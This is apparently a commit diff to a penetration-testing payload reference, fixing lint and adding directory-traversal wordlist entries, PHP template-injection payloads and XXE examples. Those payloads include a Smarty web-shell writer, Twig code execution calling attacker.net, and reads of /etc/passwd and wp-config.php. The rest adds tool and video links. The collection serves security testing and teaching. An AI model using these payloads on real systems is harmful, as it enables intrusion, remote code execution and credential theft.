Fix markdown linting

Fixed missing {FILE} placeholders

Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt

@@ -877,11 +877,11 @@
 /..\..\\..\..\\..\..\\\{FILE}
 /..\..\\..\..\\..\..\\..\\\{FILE}
 /..\..\\..\..\\..\..\\..\..\\\{FILE}
-/\..%2f
-/\..%2f\..%2f
-/\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
-/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
+/\..%2f{FILE}
+/\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
+/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
 /\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}

GraphQL Injection/README.md

@@ -38,6 +38,7 @@
 - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
 - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
 - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
+- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
 - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
 - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
 

Server Side Template Injection/PHP.md

@@ -21,21 +21,34 @@
 
 ## Templating Libraries
 
-| Template Name  | Payload Format |
-| -------------- | --------- |
-| Laravel Blade  | `{{ }}`   |
-| Latte          | `{var $X=""}{$X}`   |
-| Mustache       | `{{ }}`   |
-| Plates         | `<?= ?>`  |
-| Smarty         | `{ }`     |
-| Twig           | `{{ }}`   |
+| Template Name   | Payload Format |
+| --------------- | --------- |
+| Blade (Laravel) | `{{ }}`   |
+| Latte           | `{var $X=""}{$X}`   |
+| Mustache        | `{{ }}`   |
+| Plates          | `<?= ?>`  |
+| Smarty          | `{ }`     |
+| Twig            | `{{ }}`   |
+
+## Blade
+
+[Official website](https://laravel.com/docs/master/blade)
+> Blade is the simple, yet powerful templating engine that is included with Laravel.
+
+The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.
+
+```php
+{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
+```
+
+---
 
 ## Smarty
 
 [Official website](https://www.smarty.net/docs/en/)
 > Smarty is a template engine for PHP.
 
-```python
+```php
 {$smarty.version}
 {php}echo `id`;{/php} //deprecated in smarty v3
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
@@ -52,7 +65,7 @@
 
 ### Twig - Basic Injection
 
-```python
+```php
 {{7*7}}
 {{7*'7'}} would result in 49
 {{dump(app)}}
@@ -62,7 +75,7 @@
 
 ### Twig - Template Format
 
-```python
+```php
 $output = $twig > render (
   'Dear' . $_GET['custom_greeting'],
   array("first_name" => $user.first_name)
@@ -76,14 +89,14 @@ $output = $twig > render (
 
 ### Twig - Arbitrary File Reading
 
-```python
+```php
 "{{'/etc/passwd'|file_excerpt(1,30)}}"@
 {{include("wp-config.php")}}
 ```
 
 ### Twig - Code Execution
 
-```python
+```php
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
@@ -249,4 +262,5 @@ layout template:
 
 ## References
 
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
 - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)

Server Side Template Injection/Python.md

@@ -406,3 +406,4 @@ PoC :
 - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
 - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
 - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
+- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)

Upload Insecure Files/README.md

@@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
     * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
     * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
     * Multiple special characters: `file.jsp/././././.`
+    * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`
 
 * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
 * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".

XXE Injection/README.md

@@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s
 
 It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
 
+These are different types of entities in XML:
+
+| Type             | Prefix   | Where usable                |
+| ---------------- | -------- | --------------------------- |
+| General entity   | `&name;` | Inside XML document content |
+| Parameter entity | `%name;` | Only inside the DTD         |
+
 ## Exploiting XXE to Retrieve Files
 
 ### Classic XXE
@@ -155,7 +162,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
-<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
+<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
 ]>
 <foo>&xxe;</foo>
 ```

_LEARNING_AND_SOCIALS/YOUTUBE.md

@@ -19,6 +19,7 @@
 - [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider)
 - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
 - [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka)
+- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired)
 - [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
 - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
 - [Nahamsec](https://www.youtube.com/c/Nahamsec)
@@ -30,6 +31,7 @@
 - [STÖK](https://www.youtube.com/c/STOKfredrik)
 - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
 - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
+- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius)
 - [xct hacks](https://www.youtube.com/@xct_de)
 
 ## Conferences